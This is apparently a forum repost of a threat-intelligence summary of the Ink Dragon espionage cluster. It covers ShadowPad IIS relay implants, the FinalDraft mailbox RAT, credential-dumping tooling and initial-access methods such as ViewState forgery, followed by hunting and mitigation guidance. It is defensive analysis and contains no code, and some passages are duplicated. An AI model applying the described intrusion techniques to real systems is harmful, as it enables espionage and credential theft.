Check Point Research’s excavation of the Ink Dragon cluster reveals a precise, quietly ruthless evolution in modern espionage tradecraft: instead of treating each victim as a disposable data source, the operators systematically convert compromised IIS and SharePoint servers into active nodes in a distributed ShadowPad relay network, using victims as command-and-control hops and blending C2 traffic into legitimate HTTP behavior to maximize stealth and survivability.
Ink Dragon (also tracked under labels such as Earth Alux, REF7707, and CL‑STA‑0049 in vendor reports) is a sustained espionage cluster focused on government, telecom, and public‑sector infrastructure. The group’s operations combine mature software engineering with disciplined operational hygiene: multi‑stage loaders, living‑off‑the‑land staging, credential harvesting, and victim-as-infrastructure relay logic. Recent activity shows a geographic expansion into European government targets while maintaining operations in Southeast Asia and South America.
At the center of the activity is a ShadowPad IIS Listener module that converts infected IIS worker processes into dual-purpose implants: they act both as a local backdoor and as a transparent HTTP relay capable of pairing remote “servers” and “clients,” then streaming traffic between them so that operators can issue commands to downstream implants without directly contacting them. This relay architecture blurs provenance, multiplies routing options, and dramatically increases an intrusion’s operational endurance.
Defenders must adapt by treating internet‑facing web servers as potential infrastructure nodes for adversaries, hardening not just the host but the downstream trust relationships those hosts enable. Effective response requires pairing cloud and host telemetry, hunting for application‑level anomalies (IIS URL ACLs, debugger/scripted loader usage, and Graph API draft anomalies), and assuming that single‑machine cleanup is rarely sufficient when attackers are building cross‑victim relay meshes.
(In cases where specific exploit details, CVE IDs, or particular IoCs are referenced in public reporting, verify the exact CVE numbers and mitigation guidance with vendor advisories and current threat feeds before operational action; some exploit tokens and attributions evolve rapidly and should be validated during triage.
Source: Check Point Research Ink Dragon's Relay Network and Stealthy Offensive Operation
Ink Dragon (also tracked under labels such as Earth Alux, REF7707, and CL‑STA‑0049 in vendor reports) is a sustained espionage cluster focused on government, telecom, and public‑sector infrastructure. The group’s operations combine mature software engineering with disciplined operational hygiene: multi‑stage loaders, living‑off‑the‑land staging, credential harvesting, and victim-as-infrastructure relay logic. Recent activity shows a geographic expansion into European government targets while maintaining operations in Southeast Asia and South America.At the center of the activity is a ShadowPad IIS Listener module that converts infected IIS worker processes into dual-purpose implants: they act both as a local backdoor and as a transparent HTTP relay capable of pairing remote “servers” and “clients,” then streaming traffic between them so that operators can issue commands to downstream implants without directly contacting them. This relay architecture blurs provenance, multiplies routing options, and dramatically increases an intrusion’s operational endurance.
The Big Picture: Why this matters
- Victim becomes infrastructure. Each breached perimeter server can be repurposed as a hop—meaning defenders who see local compromise must assume the host may be serving external campaigns elsewhere.
- High stealth, low signal. Malicious listeners bind URL prefixes and fall back to normal IIS behavior for unmatched requests, making network and application telemetry appear legitimate.
- Flexible C2 channels. The actor uses multiple web‑centric access paths (ViewState deserialization, SharePoint/ToolShell exploits, living‑off‑the‑land utilities), plus cloud‑native channels such as Outlook/Microsoft Graph for resilient, whitelisted egress.
Technical narrative: the observed kill chain
1. Initial access: web‑centric and predictable
Ink Dragon’s documented entry points emphasize web software weaknesses and misconfigurations:- ViewState deserialization: When ASP.NET applications expose predictable or leaked machineKey values, attackers can forge __VIEWSTATE values to trigger unsafe deserialization and remote code execution. This continues to be a reliable vector where machineKey material is mismanaged.
- SharePoint / ToolShell exploitation: The actor also leverages SharePoint exploit chains (publicly discussed as ToolShell in vendor reporting) to achieve unauthenticated RCE and web shell deployment on on‑prem SharePoint instances. Observed mass scanning during initial exploitation waves points to a limited set of actors with early exploit access. Treat public attributions and specific CVE rollups as operational intelligence to verify against vendor advisories in your environment.
2. Local consolidation and credential harvesting
Once code execution in w3wp.exe is achieved, the actor:- Recovers IIS cryptographic secrets and configuration blobs (machineKey / DecryptionKey), decrypts local artifacts, and extracts IIS worker/app‑pool credentials that often have elevated rights across a web farm. Reused service accounts in web farms frequently enable lateral pivoting with minimal network noise.
- Uses in‑process escalation tactics (e.g., local privilege exploits such as PrintNotifyPotato or similar) to gain SYSTEM, then performs LSASS dumping (custom tools like LalsDumper were observed) and extracts registry hives (SAM, SYSTEM) for offline cracking and NTDS.dit exfiltration. These steps accelerate domain‑wide privilege escalation.
3. Lateral movement and persistence patterns
Ink Dragon’s lateral playbook relies on native protocols and layered persistence:- RDP proxies and tunnels for interactive movement; operators tunnel RDP through compromised web servers to internal workstations and servers, exposing machine names and enabling hands‑on‑keyboard sessions.
- Sideload triads and in‑memory loaders: common structure observed is EXE + malicious DLL + encrypted blob (TMP). The benign‑looking EXE loads the malicious DLL which decrypts and executes the core in memory and then erases staging files to reduce disk artifacts. Examples include MFC‑based DLL loaders and CDB/WinDbg‑based scripted loaders that patch memory and execute shellcode.
- Persistence via scheduled tasks with plausible names (e.g., SYSCHECK), or as disguised services (e.g., WindowsTempUpdate), often running under SYSTEM. Many staged binaries were found to be signed by legitimate vendors but with mismatched OriginalFileName metadata — a clear masquerade to reduce suspicion.
The ShadowPad IIS Listener: design and implications
How the listener works (high level)
The ShadowPad IIS Listener module integrates into the IIS worker process and:- Registers wildcard HTTP(S) URL prefixes using HttpAddUrl, enabling the implant to bind arbitrary host/path patterns and silently intercept matching requests.
- Decrypts and validates inbound payloads according to a proprietary protocol; if a request does not fit the protocol it returns real site content or legitimate error pages so normal traffic continues unperturbed.
Distributed relay logic
The listener maintains two registries—server and client lists—and automatically pairs entries to create transparent forwarding tunnels. When paired, the compromised host forwards raw byte streams bidirectionally between the server and client endpoints, with no further protocol transformation. This yields:- Multi‑hop chains linking unrelated victims, so a downstream implant can receive commands via one or more intermediary victims.
- Internal pivoting where the listener relays commands deeper into the same network to implants with no direct external reach.
Dual capability: relay + backdoor
Beyond transparent relaying, the same IIS module exposes a full ShadowPad command surface (file ops, process/service control, network inspection, interactive shells, staging, and more). That duality—relay node and hands‑on access point—makes each compromised IIS server exponentially more valuable to the operator.The FinalDraft family: a cloud‑native, mailbox‑based RAT
FinalDraft is Ink Dragon’s resilient, cloud‑native RAT that abuses Microsoft Graph and Outlook draft messages to hide C2 traffic inside legitimate mail flows:- The implant stores and uses a refresh token to obtain OAuth access tokens, using the Graph API to post and retrieve specially‑formatted drafts (subjects prefixed by session IDs). Payloads are base64‑encoded, AES‑encrypted, and compressed to hide content inside mail drafts. This design leverages Microsoft cloud endpoints that are commonly whitelisted, making egress filtering ineffective.
- FinalDraft supports flexible beacon scheduling, RDP activity harvesting, high‑throughput background exfiltration workers, and a modular command framework. It can harvest RDP MRU entries and Event Log session records to build lateral‑movement maps.
- An important operational detail: FinalDraft’s configuration is often machine‑specific (XORed with a ProductId hash or a fixed string), and the implant caches tokens under predictable registry keys for persistence.
Toolset and TTP catalogue (observed components)
- ShadowPad IIS Listener Module — core C2 & relay node (IIS module with URL bindings).
- ShadowPad Loader triads — EXE + DLL + TMP encrypted payloads; side‑load and in‑memory execution.
- CDBLoader — debugger‑driven memory patching and shellcode host; uses scripted config to run shellcode and load payloads.
- LalsDumper — custom LSASS dumping chain that registers an SSP, forces LSASS to load attacker code, and writes compressed memory dumps using direct syscalls for EDR evasion.
- 032Loader — sideload/host‑entropy‑based loader using InstallDate as a key; decrypts via RC4‑like algorithm and MapViewOfFile.
- FinalDraft — mailbox/Graph API RAT with modular exfiltration, remote execution, and token management.
Victimology and operational footprint
Observed targets concentrate on government and public‑sector organizations across Southeast Asia, South America, Africa, and — increasingly — Europe. The actor’s choice to repurpose perimeter servers as relays multiplies the operational value of each intrusion: European victims have been observed serving as C2 hops for operations against targets in other regions. Overlaps with other clusters (e.g., RudePanda/REF3927) show convergent targeting of exposed IIS/SharePoint infrastructure—sometimes the same vulnerable server is exploited by multiple actors independently.Cross‑validation and caveats
- Multiple vendor writeups and incident responders corroborate the broad mechanics: ShadowPad’s use of DLL sideloading and in‑memory loaders, final‑stage mailbox C2, and large‑overlay DLLs used by loader chains. These independent confirmations raise confidence in the technical details.
- Attribution to a specific nation state remains inherently probabilistic. Public reporting often links ShadowPad‑style tooling and tradecraft to PRC‑aligned clusters, but tooling reuse and sales complicate direct attribution; defenders should focus on objective containment and eradication rather than sole reliance on attribution.
- Some public claim elements (specific CVE lists, raw IP IOCs, or actor labels) evolve rapidly. Organizations should treat IOCs as scouting inputs and rely primarily on behavior‑based detection and thorough forensic analysis.
Detection and hunting guidance (practical)
Prioritize high‑signal artifacts and behaviors that fit the relay‑centric model:- Hunt for unusual IIS module insertions, unexpected HttpAddUrl bindings, or wildcard URL prefix registrations at the OS/HTTP API level. Enumerate HTTP.sys / URL ACLs where possible and compare to known bindings.
- Search for large or oddly padded DLLs in System32 or web application directories (>10s of MB) and MFC‑based DLLs loading nonstandard code flow. These are common triad loaders and sideload artifacts.
- Monitor for living‑off‑the‑land staging: suspicious curl/certutil usage to pull Base64/AES blobs, or CDB/cdb.exe executions with config scripts that patch process memory. Scripted debugger usage is a distinctive TTP to watch for.
- Watch for Microsoft Graph / Outlook draft anomalies: repeated creation/deletion of drafts with session‑prefixed subjects, drafts containing Base64 blobs, or refresh‑token usage patterns in registry locations consistent with FinalDraft. Add Graph API behavior analytics to your cloud detection rules.
- Hunt for LSASS dump artifacts and evidence of SSP registration or direct‑syscall dumping activity. Custom LSASS dumpers often write compressed dump files to %TEMP% with unique naming conventions.
- Network hunts: look for seemingly legitimate HTTP flows that traverse between unrelated organizational IP ranges but follow unusual timing/size patterns consistent with relay‑paired sessions; the IIS debug strings (when recovered) can map forwarded payload sizes and endpoints.
Mitigation checklist (prioritized)
- Immediately inventory and patch internet‑facing IIS and SharePoint servers; rotate any machineKey/service account credentials that could have leaked. If machineKey material is public or predictable, treat the site as compromised until proven clean.
- Harden IIS: enumerate and lock down HttpAddUrl bindings, restrict wildcard URL licensing, and implement allow‑lists at network edge for management ports.
- Apply strict egress controls and inspect cloud API usage: enable Graph API audit logging, require least‑privilege app registrations, and rotate refresh tokens. Monitor Outlook draft activity and conditional access for unusual mail flows.
- Treat WSUS and other trusted distribution services as crown jewels: apply emergency patches for known unsafe deserialization issues and restrict external exposure. (Examples from related ShadowPad campaigns show WSUS is a high‑impact abuse vector.
- Centralize telemetry: forward IIS logs, Sysmon process/create/load events, EDR kernel events, and cloud API logs to a SIEM for correlation; enable script‑block and command‑line logging.
- Be conservative with remediation: given the relay model and memory‑resident implants, assume full rebuilds of high‑value servers until you can prove scope is contained.
Strengths, risks and strategic assessment
Notable strengths of Ink Dragon’s model
- Operational camouflage: Using legitimate IIS behavior and Microsoft cloud services materially reduces signature‑based detection opportunities.
- Resilience through reuse: Every new victim can be immediately repurposed as a relay hop, enabling pivoting around network blocks and takedowns.
- Modular, mature tooling: A multi‑stage loader architecture and a rich command set (ShadowPad, FinalDraft) give operators fine control over collection, exfiltration, and persistence.
Key operational risks for defenders
- Hidden global mesh: The relay network means an internal remediation can be undermined by unsuspected external hops that continue to relay commands. Failure to map cross‑victim channels leaves an organization vulnerable to reactivation.
- Whitelisted egress channels: Cloud APIs like Microsoft Graph are often allowed outbound; embedding C2 in drafts bypasses egress controls and makes network detection far harder.
- Rapid IOC fade and tooling reuse: File hashes and specific IPs age quickly; behavioral detections and operational playbooks are more durable than static lists.
Conclusion
Ink Dragon’s approach is a practical demonstration of a higher‑order espionage objective: turn the world’s perimeter servers into persistent infrastructure. The ShadowPad IIS Listener concept—binding into legitimate webserver behavior, pairing nodes into relays, and simultaneously exposing a fully functional backdoor—represents an advanced operational model that multiplies risk for defenders while reducing attacker exposure.Defenders must adapt by treating internet‑facing web servers as potential infrastructure nodes for adversaries, hardening not just the host but the downstream trust relationships those hosts enable. Effective response requires pairing cloud and host telemetry, hunting for application‑level anomalies (IIS URL ACLs, debugger/scripted loader usage, and Graph API draft anomalies), and assuming that single‑machine cleanup is rarely sufficient when attackers are building cross‑victim relay meshes.
(In cases where specific exploit details, CVE IDs, or particular IoCs are referenced in public reporting, verify the exact CVE numbers and mitigation guidance with vendor advisories and current threat feeds before operational action; some exploit tokens and attributions evolve rapidly and should be validated during triage.
Source: Check Point Research Ink Dragon's Relay Network and Stealthy Offensive Operation
Similar threads
- Replies
- 0
- Views
- 32